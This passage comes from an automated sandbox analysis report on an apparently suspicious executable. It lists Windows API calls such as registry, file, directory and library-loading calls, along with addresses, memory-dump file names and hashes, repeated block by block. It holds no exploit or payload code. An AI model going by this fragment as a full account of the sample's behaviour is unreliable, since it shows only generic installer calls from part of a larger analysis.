                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3394109436-1824292864
                                                                                                              • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                              • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                              • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                              • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Enum$CloseValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 397863658-0
                                                                                                              • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                              • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                              • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1892508949-0
                                                                                                              • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                              • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3356406503-0
                                                                                                              • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                              • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                              • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                              APIs
                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 2831762973-0
                                                                                                              • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                              • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                              • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2547128583-0
                                                                                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1375471231-0
                                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNELBASE(00000000), ref: 6F972B6B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 59c6d179ac90cf96214c03b7089d7217ac16e6100ef07b2c0c24f4ef190bcf13
                                                                                                              • Instruction ID: b00ffd9cf42ae5dc1a6d1f0bfc5c9f3689a3927b0b264f8fe72aeb6ac93b367c
                                                                                                              • Opcode Fuzzy Hash: 59c6d179ac90cf96214c03b7089d7217ac16e6100ef07b2c0c24f4ef190bcf13
                                                                                                              • Instruction Fuzzy Hash: 69418EB2928714DFEB74DF68D981B5937A8EB16328F20446AE5088A1C1DF34E8918F91
                                                                                                              APIs
                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileMove
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562171763-0
                                                                                                              • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                              • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                              • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointerwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327478801-0
                                                                                                              • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                              • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                              • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                              • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
